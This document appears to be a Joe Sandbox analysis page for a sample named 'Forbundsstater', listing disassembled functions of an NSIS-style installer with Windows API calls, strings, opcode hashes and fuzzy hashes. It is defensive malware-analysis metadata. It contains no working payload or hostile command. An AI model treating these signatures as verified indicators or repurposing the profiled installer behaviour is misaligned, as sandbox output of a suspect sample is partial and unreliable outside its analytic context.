Associated: 00000006.00000002.2657548080.0000000000407000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657563681.0000000000409000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657585320.0000000000448000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Forbundsstater.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: unpacking data: %d%%$verifying installer: %d%%
API String ID: 1451636040-1158693248
Opcode ID: 51bd416a2a5802dcebde0e8cf043a9bf389b7035035a475ca1d7752134760d3a
Instruction ID: 136f1b4430288e91b1c5e5d445282cac07027c6a7f734139abdfd1d0af9ea11d
Opcode Fuzzy Hash: 51bd416a2a5802dcebde0e8cf043a9bf389b7035035a475ca1d7752134760d3a
Instruction Fuzzy Hash: C6F0127050410DABEF209F51DD49BAE3768BB00309F00843AFA16A51D0DBB95959DF59

Function 0040317B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 108fileCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00403190

Part of subcall function 0040330D: SetFilePointer.KERNEL32(00000000,00000000,00000000,00402FE5,?), ref: 0040331B

SetFilePointer.KERNEL32(00000000,00000000,?,00000000,?,00403093,00000004,00000000,00000000,?,?,?,0040300C,000000FF,00000000,00000000), ref: 004031C3
WriteFile.KERNEL32(0040BE78,?,00000000,00000000,00413E78,00004000,?,00000000,?,00403093,00000004,00000000,00000000,?,?), ref: 0040327D
SetFilePointer.KERNEL32(?,00000000,00000000,00413E78,00004000,?,00000000,?,00403093,00000004,00000000,00000000,?,?,?,0040300C), ref: 004032CF

Strings

x>A, xrefs: 004031F0

Memory Dump Source

Source File: 00000006.00000002.2657531977.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2657515414.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657548080.0000000000407000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657563681.0000000000409000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657585320.0000000000448000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Forbundsstater.jbxd

Similarity

API ID: File$Pointer$CountTickWrite
String ID: x>A
API String ID: 2146148272-3854404225
Opcode ID: c3e212118fbef9e4adb068f61efe2bd575096358676594393449bc7ea11798d5
Instruction ID: 37036d35f8974e55ed68100cf34a45723990335e8d7a2adc0945050858e8c70a
Opcode Fuzzy Hash: c3e212118fbef9e4adb068f61efe2bd575096358676594393449bc7ea11798d5
Instruction Fuzzy Hash: 7D41CB725042019FDB10DF29ED848A63BACFB54356720827FE910B22E1D7B99D41DBED

Function 0040617C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,00434000,00436800,00436800,00000000,00403330,00436800,75923420,00403510), ref: 004061DF
CharNextW.USER32(?,?,?,00000000), ref: 004061EE
CharNextW.USER32(?,00434000,00436800,00436800,00000000,00403330,00436800,75923420,00403510), ref: 004061F3
CharPrevW.USER32(?,?,00436800,00436800,00000000,00403330,00436800,75923420,00403510), ref: 00406206

Strings

*?|<>/":, xrefs: 004061CE

Memory Dump Source

Source File: 00000006.00000002.2657531977.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2657515414.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657548080.0000000000407000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657563681.0000000000409000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657585320.0000000000448000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Forbundsstater.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":
API String ID: 589700163-165019052
Opcode ID: bf19904cbb26e83114afcd58bf256c97857e1bb2abc1c9c3e805ea3815cda1ed
Instruction ID: 7432597920acc0cf63456e540fa2db4f3ec2516b3ebf296f4b2d54ebc9aa4c6f
Opcode Fuzzy Hash: bf19904cbb26e83114afcd58bf256c97857e1bb2abc1c9c3e805ea3815cda1ed
Instruction Fuzzy Hash: B711B67580021295EB303B548C40BB762F8AF54760F56803FE996772C2EB7C5C9286BD

Function 004024EC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54filestringCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(?,?,0040A580,000000FF,00409D80,00000400,?,?,00000021), ref: 0040252D
lstrlenA.KERNEL32(00409D80,?,?,0040A580,000000FF,00409D80,00000400,?,?,00000021), ref: 00402534
WriteFile.KERNEL32(00000000,?,00409D80,00000000,?,?,00000000,00000011), ref: 00402566

Strings

8, xrefs: 0040250A

Memory Dump Source

Source File: 00000006.00000002.2657531977.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2657515414.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657548080.0000000000407000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657563681.0000000000409000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657585320.0000000000448000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Forbundsstater.jbxd

Similarity

API ID: ByteCharFileMultiWideWritelstrlen
String ID: 8
API String ID: 1453599865-4194326291
Opcode ID: eb4f0eac3f684fb2a63f37bc1092f8bc6a44a302634324d4ca23fee1544f7428
Instruction ID: 3c80ca3e5ebaf71c7783d8616bec5f928a83f38c30d871a0748769bbcf272298
Opcode Fuzzy Hash: eb4f0eac3f684fb2a63f37bc1092f8bc6a44a302634324d4ca23fee1544f7428
Instruction Fuzzy Hash: 8B019271A44204BED700AFA0DE89EAF7278EB50319F20053BF502B61D2D7BC5E41DA2E

Function 00401752 Relevance: 7.6, APIs: 5, Instructions: 145stringtimeCOMMON

Download Yara Rule

APIs

lstrcatW.KERNEL32(00000000,00000000), ref: 00401793
CompareFileTime.KERNEL32(-00000014,?,00409580,00409580,00000000,00000000,00409580,00435000,?,?,00000031), ref: 004017B8

Part of subcall function 00405EE8: lstrcpynW.KERNEL32(?,?,00000400,004033C6,004281E0,NSIS Error), ref: 00405EF5

Part of subcall function 00405192: lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
Part of subcall function 00405192: lstrlenW.KERNEL32(00402D92,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
Part of subcall function 00405192: lstrcatW.KERNEL32(004216B0,00402D92), ref: 004051ED
Part of subcall function 00405192: SetWindowTextW.USER32(004216B0,004216B0), ref: 004051FF
Part of subcall function 00405192: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
Part of subcall function 00405192: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
Part of subcall function 00405192: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D

Memory Dump Source

Source File: 00000006.00000002.2657531977.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2657515414.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657548080.0000000000407000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657563681.0000000000409000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657585320.0000000000448000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Forbundsstater.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID:
API String ID: 1941528284-0
Opcode ID: f85250a5a9e88103d3d651ef37910dcedbb4e657076cd08a1369e1982fdbe284
Instruction ID: 10c9bfb48ac22d70b7a6fd4bf6847715cc6e5200bae8767ad0241ecc3b8f07ee
Opcode Fuzzy Hash: f85250a5a9e88103d3d651ef37910dcedbb4e657076cd08a1369e1982fdbe284
Instruction Fuzzy Hash: 6841B172904519BACF10BBB5CC86DAF7679EF05329F20463BF521B11E1D63C8A41CA6E

Function 00402B78 Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402B99
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402BD5
RegCloseKey.ADVAPI32(?), ref: 00402BDE
RegCloseKey.ADVAPI32(?), ref: 00402C03
RegDeleteKeyW.ADVAPI32(?,?), ref: 00402C21

Memory Dump Source

Source File: 00000006.00000002.2657531977.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2657515414.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657548080.0000000000407000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657563681.0000000000409000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657585320.0000000000448000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Forbundsstater.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: 91a0cc9b62795f3a8a15dda2708214bc4454f5c9052d466bcbd9eea0ad329b5b
Instruction ID: 9ec10266fc8442ca9feb2f2c36393197ef7fd7660a084b6a818e704b420db749
Opcode Fuzzy Hash: 91a0cc9b62795f3a8a15dda2708214bc4454f5c9052d466bcbd9eea0ad329b5b
Instruction Fuzzy Hash: 0D113A7190410CFEEF11AF90DE89EAE3B79EB44348F10057AFA05A10E0D3B59E51AA69

Function 00401CE5 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00401CEB
GetClientRect.USER32(00000000,?), ref: 00401CF8
LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D19
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D27
DeleteObject.GDI32(00000000), ref: 00401D36

Memory Dump Source

Source File: 00000006.00000002.2657531977.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2657515414.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657548080.0000000000407000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657563681.0000000000409000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657585320.0000000000448000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Forbundsstater.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: ebee129f8a245dc929862c077a7183d7f7680bcc51d1a04b4969c9551adf2949
Instruction ID: d276e06630420d280db9d3d8713a95f95ab602fc4af0e03377fdcd968a8fda9f
Opcode Fuzzy Hash: ebee129f8a245dc929862c077a7183d7f7680bcc51d1a04b4969c9551adf2949
Instruction Fuzzy Hash: B9F0ECB2A04104AFD701DFE4EE88CEEB7BCEB08301B100466F601F61A0D674AD018B39

Function 00401D41 Relevance: 7.5, APIs: 5, Instructions: 38COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401D44
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D51
MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D60
ReleaseDC.USER32(?,00000000), ref: 00401D71
CreateFontIndirectW.GDI32(0040BD88), ref: 00401DBC

Memory Dump Source

Source File: 00000006.00000002.2657531977.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2657515414.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657548080.0000000000407000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657563681.0000000000409000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657585320.0000000000448000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Forbundsstater.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID:
API String ID: 3808545654-0
Opcode ID: 5126b5a6483c23ca9b923fe170de86e7b0dfb2dc664948fdd2ce29f1bdd8c223
Instruction ID: 44c615356a1505882b51123a4f434c8e94683597a24d5f064f7d9f3cb87cb74c
Opcode Fuzzy Hash: 5126b5a6483c23ca9b923fe170de86e7b0dfb2dc664948fdd2ce29f1bdd8c223
Instruction Fuzzy Hash: 25012630948280AFE7006BB0AE4BB9A7F74EF95305F104479F145B62E2C37810009B6E

Function 00403060 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 95fileCOMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(00409230,00000000,00000000,00000000,00000000,?,?,?,0040300C,000000FF,00000000,00000000,00409230,?), ref: 00403086
WriteFile.KERNEL32(00000000,00413E78,?,000000FF,00000000,00413E78,00004000,00409230,00409230,00000004,00000004,00000000,00000000,?,?), ref: 00403113

Strings

x>A, xrefs: 004030DC

Memory Dump Source

Source File: 00000006.00000002.2657531977.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2657515414.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657548080.0000000000407000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657563681.0000000000409000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657585320.0000000000448000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Forbundsstater.jbxd

Similarity

API ID: File$PointerWrite
String ID: x>A
API String ID: 539440098-3854404225
Opcode ID: b27c88111c9479bfc016d655c0b2bfb1ccfb1f1bf46317cd24110ceb5cc412c0
Instruction ID: fc2ead670903f3fcf09a518996cfd184d9dc321171b4a7c5d6e0cc79c3f8c1f9
Opcode Fuzzy Hash: b27c88111c9479bfc016d655c0b2bfb1ccfb1f1bf46317cd24110ceb5cc412c0
Instruction Fuzzy Hash: 8C312631504219FBDF11CF65EC44A9E3FBCEB08755F20813AF904AA1A0D3749E51DBA9

Function 00404976 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(004226D0,004226D0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,0000040F,00000400,00000000), ref: 00404A07
wsprintfW.USER32 ref: 00404A10
SetDlgItemTextW.USER32(?,004226D0), ref: 00404A23

Strings

%u.%u%s%s, xrefs: 004049F1

Memory Dump Source

Source File: 00000006.00000002.2657531977.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2657515414.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657548080.0000000000407000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657563681.0000000000409000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657585320.0000000000448000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Forbundsstater.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: a87d65089fa2b22b88f3ea6921d71f9a407986b65cfb91be1df2eb5324c2a4fc
Instruction ID: 11a56ec29d8e774b63c5a31ca8dd146b3e369a93441477fc7d09fda37b012288
Opcode Fuzzy Hash: a87d65089fa2b22b88f3ea6921d71f9a407986b65cfb91be1df2eb5324c2a4fc
Instruction Fuzzy Hash: 7011E273A002243BCB10A66D9C45EAF368D9BC6374F14423BFA69F61D1D9799C2186EC

Function 00401BCA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C42

Strings

!, xrefs: 00401BFE

Memory Dump Source

Source File: 00000006.00000002.2657531977.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2657515414.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657548080.0000000000407000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657563681.0000000000409000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657585320.0000000000448000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Forbundsstater.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 9d438e6b5940c4dfeb703fc487ee7d8779a96f3a357671301b43fd1e281e0956
Instruction ID: 4e2ee5f0d92934ddef816e72561913b102c535ce611946f90f9b6b3ff638ae8b
Opcode Fuzzy Hash: 9d438e6b5940c4dfeb703fc487ee7d8779a96f3a357671301b43fd1e281e0956
Instruction Fuzzy Hash: 2221A171A44208AEEF01AFB0C98AEAD7B75EF45308F10413AF602B61D1D6B8A941DB19

Function 0040232F Relevance: 6.1, APIs: 4, Instructions: 71registrystringCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040236D
lstrlenW.KERNEL32(0040A580,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238D
RegSetValueExW.ADVAPI32(?,?,?,?,0040A580,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023C9
RegCloseKey.ADVAPI32(?,?,?,0040A580,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AA

Memory Dump Source

Source File: 00000006.00000002.2657531977.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2657515414.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657548080.0000000000407000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657563681.0000000000409000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657585320.0000000000448000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Forbundsstater.jbxd

Similarity

API ID: CloseCreateValuelstrlen
String ID:
API String ID: 1356686001-0
Opcode ID: d61713cf9ddd3f610e149d83436bff4682ee40a9bf76952b8ac674dc90b080fe
Instruction ID: 4c75d48ff27920bf3256dab6d3d18bc6d0e5d26c1911ded3a9e9fdbcc9a4e390
Opcode Fuzzy Hash: d61713cf9ddd3f610e149d83436bff4682ee40a9bf76952b8ac674dc90b080fe
Instruction Fuzzy Hash: 89118EB1A00108BEEB10AFA4DE4AEAF777CEB54358F10043AF504B61D0D7B86E419B69

Function 004015B9 Relevance: 6.1, APIs: 4, Instructions: 57COMMON

Download Yara Rule

APIs

Part of subcall function 004059DE: CharNextW.USER32(?,?,00424ED8,?,00405A52,00424ED8,00424ED8,00436800,?,75922EE0,00405790,?,00436800,75922EE0,00434000), ref: 004059EC
Part of subcall function 004059DE: CharNextW.USER32(00000000), ref: 004059F1
Part of subcall function 004059DE: CharNextW.USER32(00000000), ref: 00405A09

CreateDirectoryW.KERNEL32(?,?,00000000,0000005C,00000000,000000F0), ref: 004015E3
GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015ED
GetFileAttributesW.KERNEL32(?,?,00000000,0000005C,00000000,000000F0), ref: 004015FD
SetCurrentDirectoryW.KERNEL32(?,00435000,?,00000000,000000F0), ref: 00401630

Memory Dump Source

Source File: 00000006.00000002.2657531977.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2657515414.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657548080.0000000000407000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657563681.0000000000409000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657585320.0000000000448000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Forbundsstater.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
String ID:
API String ID: 3751793516-0
Opcode ID: 0bff73914de4e6eed910c0ec0e64b32a9aea0308159657b3b0e440d9c8159a1f
Instruction ID: 199c01fa1d361ac50fd0ab4436582695df459e1bfde9dc24052da25e00d2fbae
Opcode Fuzzy Hash: 0bff73914de4e6eed910c0ec0e64b32a9aea0308159657b3b0e440d9c8159a1f
Instruction Fuzzy Hash: D011C271908104EBDB206FA0CD449AF36B0EF15365B64063BF881B62E1D63D49819A6E

Function 00401F08 Relevance: 6.1, APIs: 4, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 00401F17
GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F39
GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00401F50
VerQueryValueW.VERSION(?,00409014,?,?,?,?,00000000,00000000), ref: 00401F69

Part of subcall function 00405E2F: wsprintfW.USER32 ref: 00405E3C

Memory Dump Source

Source File: 00000006.00000002.2657531977.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2657515414.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657548080.0000000000407000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657563681.0000000000409000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657585320.0000000000448000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Forbundsstater.jbxd

Similarity

API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
String ID:
API String ID: 1404258612-0
Opcode ID: ca7f9e254c0363c1f49dfe126ad383ac947da7ba503cf0d7429683875ede6684
Instruction ID: 69d4cfede9788cc5a39dfd4732502e81c1ba8e36930914c0ac138746a00c9a3b
Opcode Fuzzy Hash: ca7f9e254c0363c1f49dfe126ad383ac947da7ba503cf0d7429683875ede6684
Instruction Fuzzy Hash: 27114875A00108BEDB00EFA5D945DAEBBBAEF04344F21407AF501F62E1E7349E50CB68

Function 00401E51 Relevance: 6.1, APIs: 4, Instructions: 52synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 00405192: lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
Part of subcall function 00405192: lstrlenW.KERNEL32(00402D92,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
Part of subcall function 00405192: lstrcatW.KERNEL32(004216B0,00402D92), ref: 004051ED
Part of subcall function 00405192: SetWindowTextW.USER32(004216B0,004216B0), ref: 004051FF
Part of subcall function 00405192: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
Part of subcall function 00405192: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
Part of subcall function 00405192: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D

Part of subcall function 00405663: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256D8,Error launching installer), ref: 00405688
Part of subcall function 00405663: CloseHandle.KERNEL32(?), ref: 00405695

WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E80
WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401E95
GetExitCodeProcess.KERNEL32(?,?), ref: 00401EA2
CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EC9

Memory Dump Source

Source File: 00000006.00000002.2657531977.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2657515414.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657548080.0000000000407000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657563681.0000000000409000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657585320.0000000000448000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Forbundsstater.jbxd

Similarity

API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
String ID:
API String ID: 3585118688-0
Opcode ID: e2e2f1a1846438e0669df5bc00fb77d2eadfb6d246281b8a1ec737ff05b26262
Instruction ID: 8e91623f4638d025a4933f87a40467008e120c5c7d6e9a438bfd220985abd326
Opcode Fuzzy Hash: e2e2f1a1846438e0669df5bc00fb77d2eadfb6d246281b8a1ec737ff05b26262
Instruction Fuzzy Hash: 5D11A131D00204EBCF109FA1CD859DE7AB5EB04315F60443BF905B62E0C7794A92DF9A

Function 00405106 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00405135
CallWindowProcW.USER32(?,?,?,?), ref: 00405186

Part of subcall function 00404179: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040418B

Strings

, xrefs: 00405116

Memory Dump Source

Source File: 00000006.00000002.2657531977.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2657515414.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657548080.0000000000407000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657563681.0000000000409000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657585320.0000000000448000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Forbundsstater.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: ffbbbef4bb215af9c79ac16ecb942473111b8a896db240ad95dfeee9b4123394
Instruction ID: a693931b294d40b9fc88652aed0c21abafbc2ac9e0ef9b0e0ec3bcc5ba2f922e
Opcode Fuzzy Hash: ffbbbef4bb215af9c79ac16ecb942473111b8a896db240ad95dfeee9b4123394
Instruction Fuzzy Hash: B2019E71A00609FFDB215F51DD84F6B3726EB84350F508136FA007A2E1C37A8C929F6A

Function 00405B83 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00405BA1
GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,00000000,00403356,00436000,00436800), ref: 00405BBC

Strings

nsa, xrefs: 00405B90

Memory Dump Source

Source File: 00000006.00000002.2657531977.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2657515414.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657548080.0000000000407000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657563681.0000000000409000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657585320.0000000000448000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Forbundsstater.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: nsa
API String ID: 1716503409-2209301699
Opcode ID: 7054b5fb0d700673de611bc5c70211d8803a17d96c063a26fac21c3c19acc14a
Instruction ID: b92cbf5d1f1efc9604712da85ceffb4fcd72973976825a501547a71b9f4f898e
Opcode Fuzzy Hash: 7054b5fb0d700673de611bc5c70211d8803a17d96c063a26fac21c3c19acc14a
Instruction Fuzzy Hash: 14F09676600204BFDB008F55DC05A9B77B8EB91710F10803AE900F7181E2B0BD40CB64

Function 00405663 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256D8,Error launching installer), ref: 00405688
CloseHandle.KERNEL32(?), ref: 00405695

Strings

Error launching installer, xrefs: 00405676

Memory Dump Source

Source File: 00000006.00000002.2657531977.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2657515414.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
